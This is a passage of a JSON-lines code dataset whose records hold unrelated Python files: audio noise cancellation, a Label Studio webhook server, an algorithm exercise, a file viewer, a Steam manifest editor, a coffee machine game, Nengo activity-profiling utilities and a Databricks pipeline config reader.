Scope['bi_saas'].remove()\n","repo_name":"adon-li/BI_flask","sub_path":"goods/product_big_style_info.py","file_name":"product_big_style_info.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"24674642364","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sounddevice as sd\r\nfrom scipy.fftpack import fft\r\n\r\n#setting the total song duration to 3 seconds\r\nk=np.linspace(0,3,12*1024)\r\n\r\n#creating an array for left and right hand frequencies , pressing start time and total pressing time for every note in the song\r\nleft=[0,246.93,0,220,196] #the right hand frequencies of 4th octave\r\nright=[261.63,0,261.63,0,0] #the left hand frequencies of 3rd octave\r\nTi=[0,0.9,1.4,1.9,2.3] #pressing start time (0<=Ti<3)\r\nTf=[0.9,0.5,0.5,0.4,0.7] #Total pressing time\r\n\r\ndef music(k,right,left,Ti,Tf):\r\n f=np.zeros(np.shape(k)) #an array of zeros of length k\r\n # loop for traversing the arrays and resulting at the end the value of x(t) (summation of N pair of notes)\r\n for i in range(len(right)):\r\n #for each i, the values of f1,F1,ti,Ti will be substituted in the single tone generation formula\r\n f+=((np.sin(2*np.pi*left[i]*k))+(np.sin(2*np.pi*right[i]*k)))*((k>Ti[i])*(k<(Ti[i]+Tf[i])))\r\n return f\r\no=music(k,right,left,Ti,Tf)\r\nsd.play(o, 3*1024) \r\n \r\nN= 3*1024\r\nf= np.linspace(0,512,int(N/2))\r\nxf=fft(o)\r\nxf = (2/N)*np.abs(xf[0:int(N/2)])\r\n\r\nf_n1,f_n2=np.random.randint(0,512,2)\r\nrandomnoise=np.sin(2*np.pi*f_n1*k)+np.sin(2*np.pi*f_n2*k)\r\n\r\n#add the noise to sound \r\nadd=randomnoise+o\r\naddFun=fft(add)\r\n\r\n#abs to remove complex part\r\naddF=2/N * np.abs(addFun[0:int(N/2)])\r\n\r\n#sort the arrays to get the highest 2 frequencies\r\nsortAdd=np.sort(addF)\r\n\r\n#Search for the two peaks > max peak in original and remove them\r\n#search for them and restore their places -1,-2 predefined\r\naddFn1=sortAdd[-1]\r\naddFn2=sortAdd[-2]\r\n#remove max from time domain instead of freq by transforming it inversely \r\n\r\n#FREQ DOMAIN to see peaks, differentiate between signal and noise (x(t))\r\n#noises that are 
less than max peak cannot be removed as you couldn't find them\r\n#u(t) decides the interval\r\n \r\n#Get their place in freq domain (random+noise)\r\nplace1=np.where(addF==addFn1)\r\nplace2=np.where(addF==addFn2)\r\n\r\nf1=round(f[place1[0][0]])\r\nf2=round(f[place2[0][0]])\r\n\r\n#remove noises that i rounded them\r\nfilterS=add-(np.sin(2*np.pi*f_n1*k)+np.sin(2*np.pi*f_n2*k))\r\nfilterSF=fft(filterS)\r\nfilterSF=2/N * np.abs(filterSF[0:int(N/2)])\r\nsd.play(filterS,3*1024)\r\n\r\nplt.figure()\r\nplt.subplot(3,1,1)\r\nplt.plot(k,o)\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(k,add)\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(k,filterS)\r\n\r\nplt.figure()\r\nplt.subplot(3,1,1)\r\nplt.plot(f,xf)\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(f,addF)\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(f,filterSF)\r\n\r\n","repo_name":"zeyadtarek17/Noise-and-Noise-Cancellation","sub_path":"Milestone 2.py","file_name":"Milestone 2.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"22848877548","text":"from flask import Flask, request\r\nimport requests\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\nfrom pprint import pprint\r\nimport paramiko\r\nimport shutil\r\nfrom create_data import read_images_and_labels\r\napp = Flask(__name__)\r\n\r\n# create new pandas dataframe with annotations\r\n\r\nrequest_count = 0\r\nlimit = 15\r\nimages = []\r\nclasses = []\r\n\r\n@app.route(\"/\",methods=[\"POST\", \"GET\"])\r\ndef receive_webhook():\r\n\r\n\r\n \"\"\"\r\n This function receives the webhook from Label Studio and saves the annotations to a csv file to be used for training the model \r\n and also triggers the next task if the number of annotations reaches the limit.\r\n \"\"\"\r\n \r\n \r\n global request_count\r\n \r\n request_count +=1\r\n\r\n \r\n print(\"Request count: \", request_count)\r\n\r\n # get the number of annotations\r\n image_class = request.get_json()[\"annotation\"][\"result\"][0][\"value\"][\"choices\"][0]\r\n # CHANGE THE PATH IMAGES\r\n image_path = \"/home/jsultanov/.local/share/label-studio/media/upload/1/\" + request.get_json()[\"task\"][\"data\"][\"image\"].split(\"/\")[-1]\r\n images.append(image_path)\r\n classes.append(image_class)\r\n\r\n \r\n if request_count == limit:\r\n \r\n images_npy, labels_npy = read_images_and_labels(images,classes)\r\n \r\n np.save(\"train_images.npy\", images_npy)\r\n np.save(\"train_labels.npy\", labels_npy)\r\n\r\n # clear the lists for the next task\r\n images.clear()\r\n classes.clear()\r\n\r\n # copy the numpy files to the server\r\n source_file1 = \"train_images.npy\"\r\n destination_file1 = \"classification/train_images.npy\"\r\n shutil.copy(source_file1, destination_file1)\r\n\r\n source_file2 = \"train_labels.npy\"\r\n destination_file2 = \"classification/train_labels.npy\"\r\n shutil.copy(source_file2, destination_file2)\r\n # make post request to trigger the next task to remote server\r\n requests.post(\"http://127.0.0.1:5000/\", data = {'MESSAGE': 'OK'})\r\n print(\"=========Numpy files copied to remote folder=======\")\r\n request_count = 0\r\n \r\n \r\n\r\n return \"Success\"\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0')\r\n","repo_name":"ideateknoloji/Sannotate-Active-Learning","sub_path":"server_clsfc_middle.py","file_name":"server_clsfc_middle.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"}
+{"seq_id":"14075243566","text":"import sys; input = sys.stdin.readline; sys.setrecursionlimit(10**6)\nif __name__ == '__main__':\n\n def dfs(x, y):\n global cnt\n\n if x < 0 or x >= m or y < 0 or y >= n:\n return 0\n\n if coordinates[x][y] == 1:\n return 0\n\n coordinates[x][y] = 1\n cnt += 1\n\n for i in range(4):\n dfs(x + dx[i], y + dy[i])\n\n return cnt\n\n\n m, n, k = map(int, input().split())\n coordinates = [[0] * n for _ in range(m)]\n\n for _ in range(k):\n x1, y1, x2, y2 = map(int, input().split())\n for i in range(y1, y2):\n for j in range(x1, x2):\n coordinates[i][j] = 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n cnt = 0\n result = []\n\n for i in range(m):\n for j in range(n):\n cnt = dfs(i, j)\n if cnt:\n result.append(cnt)\n cnt = 0\n\n result.sort()\n print(len(result))\n for i in result:\n print(i, end=' ')\n","repo_name":"HoonK212/boj-python","sub_path":"2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29114697175","text":"#! /usr/bin/python3\n\nop=''' \npress 1 to view a single file\npress 2 to view multiple file\npress 3 to view operation similar to cat -n\npress 4 to view operation similar to cat -e\n'''\nprint(op)\na=int(input('Enter your choice'))\nif a==1:\n i=input('Enter file name:')\n jj=open(i,\"r\")\n a=jj.read()\n print(a)\n #i.close()\nelif a==2:\n i0=int(input(\"How many files do you want to show\"))\n i1=[]\n print(\"write name of files ,whose content you want to know\")\n for i in range(i0):\n \n i2=input()\n i1.append(i2)\n for i in i1:\n o1=open(str(i),'r')\n r1=o1.read()\n \n print(r1)\nelif a==3:\n i=input(\"Enter your file name:\") \n f=open(i,'r')\n data=f.read()\n a=data.split('\\n')\n l=1\n for i in a:\n print(str(l)+\" \"+i)\n l=l+1\nelif a==4:\n i=input(\"Enter your file name:\")\n f=open(i,'r')\n data=f.read()\n a=data.split('\\n')\n l=1\n for i in a:\n print(i+'$')\n l=l+1\n \n \n \n \n\n \n \n","repo_name":"chetangaur/Adhoc","sub_path":"problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20615494295","text":"import re\n\nfrom typing import IO, Tuple\n\n\nclass ManifestFileError(Exception):\n \"\"\"Exception for errors during manifest file interaction.\"\"\"\n\n\nclass ManifestKeyError(Exception):\n \"\"\"Exception for errors during parsing manifest keys and values.\"\"\"\n\n\nclass ManifestHandler:\n \"\"\"Handler for interacting with appmanifest.acf files.\"\"\"\n\n def __init__(self, path: str) -> None:\n \"\"\"Initialize handler for given manifest file.\"\"\"\n self.file = path\n self.raw_content = self.get_raw_content()\n self.priority_key, self.update_priority = self.parse_update_priority()\n\n def get_raw_content(self) -> str:\n \"\"\"Return string of appmanifest content without processing.\"\"\"\n with self._open() as manifest:\n return manifest.read()\n\n def parse_update_priority(self) -> Tuple[re.Match, int]:\n \"\"\"Get match obj & value for manifest key AutoUpdateBehavior.\"\"\"\n search = re.search( # Example Entry: '\\t\"AutoUpdateBehavior\"\\t\\t\"0\"'\n r'\\t\"AutoUpdateBehavior\"\\t\\t\"(\\d)\"', self.raw_content\n )\n if search is None:\n raise ManifestKeyError(\"AutoUpdateBehavior\")\n return search, int(search.group(1))\n\n def write_new_update_priority(self, priority: int = 2) -> None:\n \"\"\"Write new value for AutoUpdateBehavior key to 
appmanifest.\"\"\"\n key_str = self.priority_key.group()\n new_content = self.raw_content.replace(\n key_str, key_str.replace(str(self.update_priority), str(priority))\n )\n with self._open(\"w\") as manifest:\n manifest.write(new_content)\n\n @property\n def game_title(self) -> str:\n \"\"\"Extract title of game from manifest contents.\"\"\"\n search = re.search(r'\\t\"name\"\\t\\t\"(.*)\"', self.raw_content)\n if search is None:\n raise ManifestKeyError(\"name\")\n return search.group(1)\n\n def _open(self, filemode=\"r\") -> IO:\n \"\"\"Open manifest file in specified mode.\"\"\"\n try:\n return open(self.file, filemode, encoding=\"utf-8\")\n except OSError as exc:\n raise ManifestFileError(\n \"cannot access manifest file\", self.file\n ) from exc\n\n\nif __name__ == '__main__':\n test_manifest = ManifestHandler(r\".test_manifests\\appmanifest_261640.acf\")\n print(\n test_manifest.game_title,\n test_manifest.priority_key,\n test_manifest.update_priority,\n sep=\"\\n\", end=\"\\n\"\n )\n","repo_name":"vlntnwbr/ssdk","sub_path":"ssdk/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"70351345775","text":"def make_coffee():\n from coffee_type import coffees\n from coffee_type import inventory\n from coffee_type import murphy\n import time\n\n # allow for spelling mistake from the user.\n latte = ['latte', 'Latte']\n espresso = ['espresso', 'expresso', 'espreso']\n cappuccino = ['cappuccino', 'capuccino', 'cappucino', 'cappuccinno']\n\n def check_inventory():\n \"\"\"Validate inventory availability before offering choices to clients\"\"\"\n name = []\n for key in coffees:\n name.append(key['name'])\n # used to print the list of names available to clients\n coffee_choices = name\n # print to validate the coffee_type works\n # checks for resource in inventory and will remove the choice that can't be done anymore\n for item in coffees:\n if inventory['water'] < item['water'] or inventory['coffee'] < item['coffee'] or inventory['milk'] < item['milk']:\n coffee_choices.remove(item['name'])\n print(f\"{item['name']} (not available)\")\n return coffee_choices\n\n choices = check_inventory()\n\n def user_choice():\n \"\"\"Return the dictionary of the coffee chosen with qty for price, water, coffee and milk.\n Also allow to turn machine off or print report of sales and inventory\"\"\"\n choice = input(f\"What would you like? {', '.join(choices)}: \")\n if choice not in choices and choice != 'report' and choice != 'off':\n print(\"your choice is not available. Please choose again\")\n make_coffee()\n else:\n if choice in latte:\n return coffees[1]\n elif choice in espresso:\n return coffees[0]\n elif choice in cappuccino:\n return coffees[2]\n elif choice == 'report' or choice == 'off':\n if choice == 'report':\n report()\n elif choice == 'off':\n print(\"coffee machine off\")\n turn_on = input(\"Type 'on' to resume machine operations: \")\n if turn_on == \"on\":\n make_coffee()\n else:\n print('\\nwrong command. 
You just broke the machine.\\nPlease call tech support ')\n exit(code='code 13')\n else:\n print('wrong choice, try again')\n make_coffee()\n\n def report():\n \"\"\"print the inventory (profit, water, coffee, milk) formatted\"\"\"\n for key, value in inventory.items():\n print(str(key) + ': ' + str(value))\n\n coffee_2_make = user_choice()\n accepted_coin = [.05, .10, .25]\n price = float(coffee_2_make['price'])\n total_in = 0\n paying = True\n\n while paying:\n if total_in < price:\n left_to_pay = price - total_in\n coin = float(input(f\"{format(left_to_pay, '.2f')}$, Insert a coin: .25\\xa2, .10\\xa2 or .05\\xa2.: \"))\n if coin not in accepted_coin:\n print('(money returned) Only coins accepted are: .25\\xa2, .10\\xa2 or .05\\xa2.')\n else:\n total_in = total_in + coin\n elif total_in > price:\n print(f\"{format(total_in - price, '.2f')}$ is your change. Enjoy your coffee\")\n paying = False\n inventory['profit'] += price\n inventory[\"water\"] -= coffee_2_make[\"water\"]\n inventory[\"coffee\"] -= coffee_2_make[\"coffee\"]\n inventory[\"milk\"] -= coffee_2_make[\"milk\"]\n elif total_in == price:\n import random\n lucky = random.choice(murphy)\n print('\\npercolating')\n time.sleep(2)\n print(lucky)\n print(\"Enjoy your coffee\\n\\n\")\n paying = False\n inventory['profit'] += price\n inventory[\"water\"] -= coffee_2_make[\"water\"]\n inventory[\"coffee\"] -= coffee_2_make[\"coffee\"]\n inventory[\"milk\"] -= coffee_2_make[\"milk\"]\n time.sleep(2)\n make_coffee()\n\n\nmake_coffee()\n","repo_name":"Gabbbrielle/coffee_machine","sub_path":"coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28968955728","text":"\"\"\"\nvarious tools for use with Nengo such as input signal scaling and running nengo\nsimulations to return the neural profile showing different activity metrics.\n\nThe profile can consist of:\n- the proportion of active neurons over time\n- the proportion of time neurons are active\n- raster plot of the activity\n\nThese can be run individually for any nengo network, or the parameters to\ninstantiate a dynamics_adaptation network from abr_control can be passed in to\nget_learning_profile() to run all three of the above\n\nNOTE: see examples of running for a single profile, or looping through various\nintercepts to later view in the intercept_scan_viewer.py gui\n\"\"\"\n\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport nengo\nimport numpy as np\nfrom abr_control._vendor.nengolib.stats import ScatteredHypersphere\nfrom nengo.utils.matplotlib import rasterplot\n\n\ndef generate_encoders(n_neurons, input_signal=None, thresh=0.008, depth=0):\n \"\"\"\n Accepts an input_signal in the shape of time X dim and outputs encoders\n for the specified number of neurons by sampling from the input.\n The selection is made by choosing inputs randomly and checking that\n they are minimally thresh away from one another to avoid overly similar\n encoders. If we have exhausted the search then we increase thresh and\n rescan, until len(encoders) == number of neurons. 
If there are not\n enough input signal samples to select for the number of neurons, or an\n input_signal of None is passed in, the remainder will be filled with a\n selection from a scattered hypersphere\n\n PARAMETERS\n ----------\n n_neurons : int\n the number of neurons in the simulation, needed to get\n a corresponding number of encoders\n input_signal : array(time_steps, dimensions), Optional (Default: None)\n the input signal to sample from\n thresh : float, Optional (Default: 0.008)\n the threshold to keep encoder values minimally apart from\n It may be helpful to increase this value if there are many more\n inputs than there are neurons in the final simulation to speed up\n the encoder selection process\n depth : int\n how many times has this function been recursively called\n \"\"\"\n\n # first run so we need to generate encoders for the sessions\n ii = 0\n iters_with_no_update = 0\n prev_n_indices = 0\n while input_signal.shape[0] > n_neurons:\n\n ii += 1\n if (ii % 1000) == 0:\n print(\n \"Downsampled to %i encoders at iteration %i\"\n % (input_signal.shape[0], ii),\n \"Current threshold value: %.3f\" % thresh,\n end=\"\\r\",\n )\n\n # choose a random set of indices\n n_indices = input_signal.shape[0]\n\n # make sure we're dealing with an even number\n n_indices -= int(n_indices % 2)\n n_half = int(n_indices / 2)\n\n # split data into two random groups\n randomized_indices = np.random.permutation(range(n_indices))\n a = randomized_indices[:n_half]\n b = randomized_indices[n_half:]\n data1 = input_signal[a]\n data2 = input_signal[b]\n\n # calculate the 2 norm between random pairs between data1 and 2\n distances = np.linalg.norm(data1 - data2, axis=1)\n # find any pairs within threshold distance of each other\n under_thresh = distances > thresh\n # remove the values from data2 within thresh of corresponding data1\n input_signal = np.vstack([data1, data2[under_thresh]])\n\n if prev_n_indices == n_indices:\n iters_with_no_update += 1\n else:\n iters_with_no_update = 0\n\n # if we've run 50 iterations but we're still haven't downsampled\n # enough, increase the threshold distance and keep going\n if iters_with_no_update == 50:\n iters_with_no_update = 0\n thresh += 0.1 * thresh\n prev_n_indices = n_indices\n\n if input_signal.shape[0] != n_neurons:\n print(\n \"Too many indices removed, appending samples from \" + \"ScatteredHypersphere\"\n )\n length = n_neurons - input_signal.shape[0] + 1\n hypersphere = ScatteredHypersphere(surface=True)\n hyper_inputs = hypersphere.sample(length, input_signal.shape[1])\n input_signal = np.vstack((input_signal, hyper_inputs))\n\n # make sure that the new inputs meet threshold constraints\n if depth < 10:\n input_signal = generate_encoders(\n n_neurons, input_signal, thresh=thresh, depth=depth + 1\n )\n else:\n # if we've tried several times to find input meeting\n # outside threshold distance but failed, return with warning\n # so we're not stuck in infinite loop\n warnings.warn(\"Could not find set of encoders outside thresh distance\")\n\n # clear the previous recurrent print\n print(\"\\n\")\n return np.array(input_signal)\n\n\ndef raster_plot(network, input_signal, ax, network_ens=None, n_ens_to_raster=None):\n \"\"\"\n Accepts a Nengo network and runs a simulation with the input_signal\n Plots rasterplot onto ax object up to n_ens_to_raster ensembles\n if n_ens_to_raster is None, all ensembles will be plotted\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np 
array shape of (time_steps x input_dim)\n the input used for the network sim\n ax: ax object\n used for the rasterplot\n n_ens_to_raster: int, Optional (Default: None)\n the number of ensembles to plot in the raster,\n if None all will be plotted\n \"\"\"\n if network_ens is None:\n network_ens = network.adapt_ens\n\n if n_ens_to_raster is None:\n n_ens_to_raster = len(network_ens)\n\n spike_trains = get_activities(\n network=network, network_ens=network_ens, input_signal=input_signal\n )\n\n time = np.ones(len(input_signal))\n\n ax = rasterplot(np.cumsum(time), spike_trains, ax=ax)\n\n ax.set_ylabel(\"Neuron\")\n ax.set_xlabel(\"Time [sec]\")\n ax.set_title(\"Spiking Activity\")\n\n return spike_trains\n\n\ndef get_activities(network, input_signal, network_ens=None, dt=0.001, synapse=None):\n \"\"\"\n Accepts a Nengo network and input signal and simulates it, returns the\n activities. If synapse is None, it returns the spike trains\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np array shape of (time_steps x input_dim)\n the input used for the network sim\n synapse: float, Optional (Default: None)\n the synapse filter on the nengo probe\n \"\"\"\n if network_ens is None:\n network_ens = network.adapt_ens\n\n # if there aren't neuron probes in the network add them\n with network.nengo_model:\n network.probe_neurons = []\n if not isinstance(network_ens, list):\n network_ens = [network_ens]\n for ens in network_ens:\n network.probe_neurons.append(nengo.Probe(ens.neurons, synapse=synapse))\n network.sim = nengo.Simulator(network.nengo_model, progress_bar=False)\n\n for mm, in_sig in enumerate(input_signal):\n print(\"Running sim %i/%i\" % (mm, len(input_signal)), end=\"\\r\")\n network.input_signal = in_sig\n network.sim.run(dt, progress_bar=False)\n\n activities = []\n for probe in network.probe_neurons:\n activities.append(network.sim.data[probe] * dt)\n activities = np.hstack(activities)\n\n return np.array(activities)\n\n\ndef proportion_neurons_active_over_time(\n input_signal=None,\n network=None,\n network_ens=None,\n pscs=None,\n synapse=0.005,\n ax=None,\n n_neurons=None,\n n_ensembles=None,\n):\n \"\"\"\n Accepts a Nengo network and simulates its response to a given input\n Plots the proportion of active neurons vs run time onto the ax object\n Returns the proportion active and the post-synaptic currents\n\n PARAMETERS\n ----------\n input_signal: np array (time_steps x input_dim)\n the input used for the network sim\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n pscs: np.array (timesteps x n_neurons), Optional (Default: None)\n the output from get_activities(synapse)\n where 0.005 is the default pre_synapse time constant in PES\n ax: ax object\n for plotting the output\n \"\"\"\n assert not (\n network is None and pscs is None\n ), \"Either a network object or an array of spike trains must be provided\"\n\n if pscs is None:\n if network_ens is None:\n network_ens = network.adapt_ens\n\n pscs = get_activities(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n synapse=synapse,\n )\n\n n_neurons_active = np.zeros(pscs.shape[0])\n for ii, timestep in enumerate(pscs):\n n_neurons_active[ii] = len(np.where(timestep > 1e-2)[0])\n if n_neurons is None:\n n_neurons = network.n_neurons\n if n_ensembles is None:\n n_ensembles = network.n_ensembles\n\n proportion_neurons_active = n_neurons_active / (n_neurons * n_ensembles)\n\n if ax is not 
None:\n print(\"Plotting proportion of active neurons over time...\")\n ax.plot(proportion_neurons_active, label=\"proportion active\")\n\n ax.set_title(\"Proportion of active neurons over time\")\n ax.set_ylabel(\"Proportion Active\")\n ax.set_xlabel(\"Time steps\")\n ax.set_ylim(0, 1)\n plt.legend()\n\n return proportion_neurons_active, pscs\n\n\ndef proportion_time_neurons_active(\n input_signal=None,\n network=None,\n network_ens=None,\n pscs=None,\n synapse=0.005,\n ax=None,\n **kwargs,\n):\n \"\"\"\n Accepts a Nengo network and simulates its response to a given input\n Plots a histogram of neuron activity relative to run time onto ax\n Returns the time active and the post-synaptic currents\n\n PARAMETERS\n ----------\n input_signal: np array (time_steps x input_dim)\n the input used for the network sim\n network: .DynamicsAdaptation, Optional, (Default: None)\n 'abr_control.controllers.signals.dynamics_adaptation'\n pscs: np.array (timesteps x n_neurons), Optional (Default: None)\n the output from get_activities(synapse)\n where 0.005 is the default pre_synapse time constant in PES\n ax: ax object\n for plotting the output\n \"\"\"\n assert not (\n network is None and pscs is None\n ), \"Either a network object or an array of spike trains must be provided\"\n\n if pscs is None:\n if network_ens is None:\n network_ens = network.adapt_ens\n\n pscs = get_activities(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n synapse=synapse,\n )\n\n # for spike_train in pscs:\n n_timesteps_active = np.zeros(pscs.shape[1])\n for ii, timestep in enumerate(pscs.T):\n n_timesteps_active[ii] = len(np.where(timestep > 1e-2)[0])\n proportion_time_active = n_timesteps_active / pscs.shape[0]\n\n if ax is not None:\n plt.hist(proportion_time_active, bins=np.linspace(0, 1, 100))\n ax.set_ylabel(\"Number of active neurons\")\n ax.set_xlabel(\"Proportion of Time\")\n ax.set_title(\"Proportion of time neurons are active\")\n\n return proportion_time_active, pscs\n\n\ndef n_neurons_active_and_inactive(activity):\n \"\"\"\n Accepts a list of neural activities and returns how many neurons are\n active and never active\n\n PARAMETERS\n ----------\n activity: int list of shape (n_timesteps x n_neurons)\n a list of the neural activity over time\n \"\"\"\n activity = np.asarray(activity)\n if activity.ndim != 2:\n raise Exception(\"Input should be n_timesteps x n_neurons\")\n\n activity_sum = np.sum(activity, axis=0)\n n_inactive = len(np.where(activity_sum == 0)[0])\n n_active = activity.shape[1] - n_inactive\n return n_active, n_inactive\n\n\ndef gen_learning_profile(\n network,\n input_signal,\n network_ens=None,\n ax_list=None,\n synapse=None,\n n_ens_to_raster=None,\n show_plot=True,\n savename=None,\n n_neurons=None,\n n_ensembles=None,\n):\n \"\"\"\n Plots the network's neural activity onto three subplots, the rasterplot,\n proportion of active neurons over time, and how many neurons were active\n over different proportions of run time\n\n Accepts an abr_control dynamics_adaptation network object and input signal\n Plots\n 1. rasterplot showing spikes for each neuron over time on one axis, and the\n input signal of the other\n 2. proportion of time active, the number of neurons active vs proportion\n of run time\n 3. 
proportion of neurons that are active over time\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np array shape of (time_steps x input_dim)\n the input used for the network sim\n ax_list: list of 3 ax objects\n used for the rasterplot\n n_ens_to_raster: int, Optional (Default: None)\n the number of ensembles to plot in the raster,\n if None all will be plotted\n show_plot: boolean, Optional (Default: True)\n whether to show the figure at the end of the script or not\n savename: string, Optional (Default: None)\n string where to save figure, including figure name. If None will not save\n network_ens: list of ensembles to probe, Optional (Default: None)\n if None then function will assume the network has an ensemble list\n saved as self.adapt_ens. This allows for other definitions to be used\n \"\"\"\n\n if ax_list is None:\n plt.figure(figsize=(12, 16))\n ax_list = []\n for ii in range(0, 3):\n ax_list.append(plt.subplot(3, 1, ii + 1))\n\n print(\"Getting rasterplot...\")\n pscs = raster_plot(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n ax=ax_list[0],\n n_ens_to_raster=n_ens_to_raster,\n )\n\n print(\"Getting neuron activity over time...\")\n # use the input signal to generate the pscs\n proportion_active, _ = proportion_neurons_active_over_time(\n pscs=pscs,\n n_neurons=n_neurons,\n n_ensembles=n_ensembles,\n input_signal=input_signal,\n network=network,\n network_ens=network_ens,\n ax=ax_list[1],\n synapse=synapse,\n )\n\n # use the same pscs here rather than rerunning simulation\n print(\"Getting proportion of time neurons are active...\")\n proportion_time_neurons_active(\n network=network,\n network_ens=network_ens,\n pscs=pscs,\n ax=ax_list[2],\n synapse=synapse,\n )\n\n n_active, n_inactive = n_neurons_active_and_inactive(activity=pscs)\n\n print(\"Number of neurons inactive: \", n_inactive)\n print(\"Number of neurons active: \", n_active)\n ax_list[1].legend([\"Mean Prop Active: %.2f\" % np.mean(proportion_active)])\n ax_list[2].legend([\"Active: %i | Inactive: %i\" % (n_active, n_inactive)])\n\n plt.tight_layout()\n if savename is not None:\n print(f\"Saving figure to {savename}\")\n plt.savefig(savename)\n if show_plot:\n plt.show()\n\n\ndef gen_intercept_bounds_and_modes(\n intercept_range=None, intercept_step=0.1, mode_range=None, mode_step=0.2\n):\n \"\"\"\n Accepts a range of intercept bounds and modes and returns an np.array\n of the valid combinations\n\n The validity is based on the following rules:\n - left bound < right bound\n - mode >= left bound\n - mode <= right bound\n\n PARAMETERS\n ----------\n intercept_range: list of two floats, Optional (Default: [-0.9, 1])\n the range of bounds to try. *See Note at bottom*\n mode_range: list of two floats, Optional (Default: [-0.9, 1])\n the range of modes to try. *See Note at bottom*\n intercept_step: float, Optional (Default: 0.1)\n the step size for the range of values between the range specified\n mode_step: float, Optional (Default: 0.2)\n the step size for the range of values between the range specified\n\n NOTE:\n the way the range function used on these values works, the second\n value (far right of range) is ignored. 
For this reason, to include\n 0.9, you must have the right side of the limit set to your desired\n limit + intercept_step.\n EX: to include 0.9 as the far right limit for the intercept bounds,\n assuming the intercept step is set to 0.1, the intercept range for\n the right bound must be set to 0.9 + 0.1 = 1.0 to check the range\n of values up to and including 0.9\n \"\"\"\n if intercept_range is None:\n intercept_range = [0.0, 1]\n if mode_range is None:\n mode_range = [0.0, 1]\n intercept_range = np.arange(intercept_range[0], intercept_range[1], intercept_step)\n mode_range = np.arange(mode_range[0], mode_range[1], mode_step)\n\n # Create list of all possible intercepts\n intercepts = np.array(np.meshgrid(intercept_range, intercept_range)).T.reshape(\n -1, 2\n )\n # get a list of all valid intercepts\n valid = []\n for vals in intercepts:\n vals[0] = round(vals[0], 1)\n vals[1] = round(vals[1], 1)\n if vals[0] < vals[1]:\n for mode in mode_range:\n mode = round(mode, 1)\n if vals[0] <= mode <= vals[1]:\n valid.append(np.array([vals[0], vals[1], mode]))\n\n intercepts = np.array(valid)\n print(\"There are %i valid combinations of intercepts and modes\" % len(intercepts))\n\n return intercepts\n","repo_name":"abr/abr_analyze","sub_path":"abr_analyze/nengo/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":17720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"5553511733","text":"import sys\n\nreadline, write = (sys.stdin.readline, sys.stdout.write)\nres = []\n\nt = int(readline())\nfor _ in range(t):\n n = int(readline())\n costs = list(map(int, readline().strip().split(\" \")))[:n]\n total = int(readline())\n dp = [1] + [0] * (total)\n for cost in costs:\n for i in range(cost, total + 1):\n dp[i] += dp[i - cost]\n res.append(dp[total])\nwrite(\"\\n\".join(str(i) for i in res))","repo_name":"hyeongcheolkim/ProblemSolving","sub_path":"Python/ps_baekjoon/9084/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"2555506727","text":"# Databricks notebook source\nimport dlt\nimport pyspark.sql.functions as F\nimport json\n\nstaged_data_root = spark.conf.get(\"dltPipeline.stagedDataRoot\")\n\n# COMMAND ----------\n\ndef get_tables_to_ingest():\n # Here we are using pipeline parameters to set the configuration of tables to ingest;\n # this could be pulled directly from the SQL metastore by\n # connecting to it via JDBC\n #\n # In production, it would be best to scope this pipeline\n # to a collection of tables, rather than all the tables available,\n # eg don't ingest 100 tables at once here; limit it to a logical grouping\n \n # the below expects configuration to be of the format:\n # dltPipeline.table.[n].(name|identityCols)\n # eg:\n #\n # dltPipeline.table.0.name my_table_1\n # dltPipeline.table.0.identityCols id\n # dltPipeline.table.1.name my_table_2\n # dltPipeline.table.1.identityCols name,revision\n \n # this is pretty fragile code - doesn't handle errors/bad config gracefully\n max_config_items = 1000 # failsafe for max config\n table_config = []\n for i in range(0, max_config_items):\n try:\n name = spark.conf.get(f'dltPipeline.table.{i}.name')\n identity_cols = spark.conf.get(f'dltPipeline.table.{i}.identityCols').split(',')\n except Exception:\n break\n \n table_config.append({\"name\": name, \"identity_cols\": identity_cols})\n \n return table_config\n\n# 
